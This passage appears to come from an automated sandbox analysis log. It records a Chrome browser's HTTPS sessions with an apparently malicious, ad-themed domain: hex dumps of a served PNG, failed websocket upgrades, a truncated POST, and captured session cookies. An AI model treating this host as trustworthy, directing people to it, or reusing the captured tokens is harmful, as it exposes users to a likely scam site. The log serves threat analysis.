                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: aa 76 4f d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d b5 b8 0f 9c
                                                                                                                                      Data Ascii: vO0:JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 7d 5e e4 aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd 00 dc 0c 7c
                                                                                                                                      Data Ascii: }^ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ|
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 60 74 08 49 92 24 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c d2 53 af 47 e1
                                                                                                                                      Data Ascii: `tI$I-%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,SG


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      68192.168.2.1649790104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:53 UTC1162OUTGET /stJHdx5abCDRUWhdXjmVIv3zo2ry8Mmnl7DqPy6KQiYHAxqLL9JOrSrQVeGnjcq8gh252 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:54 UTC669INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:54 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 70712
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="stJHdx5abCDRUWhdXjmVIv3zo2ry8Mmnl7DqPy6KQiYHAxqLL9JOrSrQVeGnjcq8gh252"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rwbcwHUus6ciS6%2FTibgz%2Fzcg9r4Cyh6vyTWHSg2oRW4uRlqaWJ1804zlMPCzRgnTFvbb9%2F6o5fa9Vinf%2BJsyGuiZ%2FcQwM4V80UCY5A6rsXQJO178c2Rty%2BZhYZGdcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6bac1f3b08df-SEA
                                                                                                                                      2024-05-08 18:12:54 UTC700INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                                                                      Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:54 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                                      2024-05-08 18:12:54 UTC1126INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                                                      Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      69192.168.2.1649791104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:54 UTC1345OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: Upgrade
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Upgrade: websocket
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-WebSocket-Version: 13
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      Sec-WebSocket-Key: RcYZk8HfweyeKO95vqNL+A==
                                                                                                                                      Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                      2024-05-08 18:12:54 UTC617INHTTP/1.1 400 Bad Request
                                                                                                                                      Date: Wed, 08 May 2024 18:12:54 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWwjZFkeHvOP6%2Fw4qBSp1%2Fjq0l7ZNex2xv7xTUhl%2FB5VgcxE6Mw3nDHItbuHq8HI8iu4fpDQL4joxhh%2Fzyl%2FOS2UPDRjpDzYt5PFhhNvYIyJ0pqcOhuTJ0YZHzpudoLp6834BP7zRam11CgVxIthaLMsnkSNVlk7s84kMHkKm21L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6bafe80908fb-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:54 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                                      Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                                      2024-05-08 18:12:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      70192.168.2.1649792104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:04 UTC1345OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: Upgrade
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Upgrade: websocket
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-WebSocket-Version: 13
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      Sec-WebSocket-Key: Ys1v6CYsq6CAUXHsI+n92w==
                                                                                                                                      Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                      2024-05-08 18:13:05 UTC623INHTTP/1.1 400 Bad Request
                                                                                                                                      Date: Wed, 08 May 2024 18:13:05 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qQLEYQ%2BicXsYpjcwW0Q8OxWorD1NBTD7qCw6IuXfXl8kjKFsaYttJkjGDo7%2BNJ1%2Bh53nMnjLXok8yl0slUbCES%2FS3uWtxf%2Bt1mCKLxsdr3NerRwiUOX78Y%2B8yyKjlDnhl%2BRNCm2HoK3xT3i4%2F6aUb0VMOK5q03jXUxT5mRjraIol"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6bf0699beb97-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:13:05 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                                      Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                                      2024-05-08 18:13:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      71192.168.2.1649793104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:13:10 UTC1660OUTPOST /qzgXe6GTtpy9MQNktQ1m82zcabjeVXbE6XxvQzPom7 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Content-Length: 31
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                      X-Requested-With: XMLHttpRequest
                                                                                                                                      sec-ch-ua-mobile: ?0
